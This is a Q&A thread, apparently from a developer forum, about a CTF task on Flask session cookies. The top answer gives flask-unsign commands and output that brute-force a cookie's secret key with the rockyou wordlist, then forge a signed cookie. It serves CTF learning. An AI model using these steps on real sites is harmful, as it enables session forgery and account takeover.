# Flask Session Cookie Tampering

Tags: flask, session-cookies, sha1, ctf

I was competing in a CTF contest and faced an issue while trying to manipulate a Flask session cookie.

Specifically, I was able to decode it successfully (without having its secret key) using [Flask Session Cookie Decoder/Encoder](https://github.com/noraj/flask-session-cookie-manager):

```bash
python flask_session_cookie_manager3.py decode -c ".eJwtjkGKAzEMBL-S9TkHy5Yte96wP1jCIEvyJmxIYDxzCvn7-pBTUw1N18ut_c7jasMtPy932me4cYjYGO7svp-_t8fpw_24f7nL-3Kem83G1S37dtikm7rFQUJBRSOL1GKWVCoRC3ED7VAz9FKsVi9aO2RgJmgSi88VuQCmXghjaRZjSCqBDTm3qE1LAh8bGnuG3jAHCV4iZlAoPkhiAGghT9v1GLZ9bCbK2Pq6P__sMQuev2ZcKQFkMinJWhRSqB4hYyWv2oWre_8D5vtQyA.ZTUbZQ.erv_yZmYg44tiaJ0u8fqKailHUc"
```

as you can see below:

```
b'{"_flashes":[{" t":["success","Login successful!"]}],"_fresh":true,"_id":"154c4d4e7e37b36c58977ac7ab1df1961f88e990cd9f161aa71bc380694a8145f87438be3325dc2ae4a6b3dbd85103b4ea0a1fb462c20c3461d1802c5a111b26","_user_id":"1","csrf_token":"acd9eea9751167ec85eb3c7d1904164970ddfca9"}'
```

but when I tried to manipulate it and sign it again, I found that I have to use the original secret key.

Why is that?

Answer (score 9):

As Elias has already mentioned, the cookie can be decoded without the secret key, but it cannot be manipulated without it for obvious security reasons. If cookie tampering was as easy as that, nobody would use [Flask sessions](https://flask.palletsprojects.com/en/3.0.x/api/#sessions). Therefore, your task is to find the secret key, and since the [SHA-1](https://github.com/pallets/flask/blob/d61198941adcb191ddb591f08d7d912e40bde8bc/src/flask/sessions.py#L286) hash function is non-reversible, you should turn your attention to the human factor.

That being said, you'll have to "guess" the secret key of the contest's careless programmer using [brute force](https://en.wikipedia.org/wiki/Brute-force_attack), and fortunately, [Flask-Unsign](https://github.com/Paradoxis/Flask-Unsign) can assist you with that.

You can install it via [pip](https://en.wikipedia.org/wiki/Pip_(package_manager)) by using the following command:

```bash
pip3 install flask-unsign
```

but before using it, you will need a wordlist like [rockyou](https://www.kaggle.com/datasets/wjburns/common-password-list-rockyoutxt), which you can download from the Kali Linux GitLab repository by using a command like the one below:

```bash
curl -JO https://gitlab.com/kalilinux/packages/wordlists/-/raw/kali/master/rockyou.txt.gz && gunzip rockyou.txt.gz
```

- *[-J, --remote-header-name](https://curl.se/docs/manpage.html#-J): Uses the server-specified Content-Disposition filename instead of extracting a filename from the URL when saving the file locally.*
- *[-O, --remote-name](https://curl.se/docs/manpage.html#-O): Writes the output to a local file named like the remote file obtained, using the server-specified filename.*

Now you can perform the brute force attack using the following command:

```bash
flask-unsign --unsign --cookie '.eJwtjkGKAzEMBL-S9TkHy5Yte96wP1jCIEvyJmxIYDxzCvn7-pBTUw1N18ut_c7jasMtPy932me4cYjYGO7svp-_t8fpw_24f7nL-3Kem83G1S37dtikm7rFQUJBRSOL1GKWVCoRC3ED7VAz9FKsVi9aO2RgJmgSi88VuQCmXghjaRZjSCqBDTm3qE1LAh8bGnuG3jAHCV4iZlAoPkhiAGghT9v1GLZ9bCbK2Pq6P__sMQuev2ZcKQFkMinJWhRSqB4hYyWv2oWre_8D5vtQyA.ZTUbZQ.erv_yZmYg44tiaJ0u8fqKailHUc' --no-literal-eval -w rockyou.txt
```

- *The `--no-literal-eval` argument was used because Flask-Unsign assumes by default that each word in a given wordlist is enclosed in quotes. However, this is not the case with the rockyou wordlist.*

and find the secret key after a few thousand attempts:

```
[*] Session decodes to: {'_flashes': [('success', 'Login successful!')], '_fresh': True, '_id': '154c4d4e7e37b36c58977ac7ab1df1961f88e990cd9f161aa71bc380694a8145f87438be3325dc2ae4a6b3dbd85103b4ea0a1fb462c20c3461d1802c5a111b26', '_user_id': '1', 'csrf_token': 'acd9eea9751167ec85eb3c7d1904164970ddfca9'}                       
[*] Starting brute-forcer with 8 threads..                                                                                                     
[+] Found secret key after 175360 attempts                                                                                                     
b'Galaxy'
```

Finally, having found the secret key, you can use it to sign your own cookie with modified session data according to your needs:

```bash
flask-unsign --sign --cookie "modified session data here" --secret 'Galaxy'
```

Answer (score 0):

What you described is the expected behavior by design - the cookie can be decoded without the secret key, but it cannot be modified without it.

from [documentation](https://flask.palletsprojects.com/en/3.0.x/api/#sessions):

> If you have set Flask.secret_key (or configured it from SECRET_KEY) you can use sessions in Flask applications. A session makes it possible to remember information from one request to another. The way Flask does this is by using a signed cookie. The user can look at the session contents, but can’t modify it unless they know the secret key, so make sure to set that to something complex and unguessable.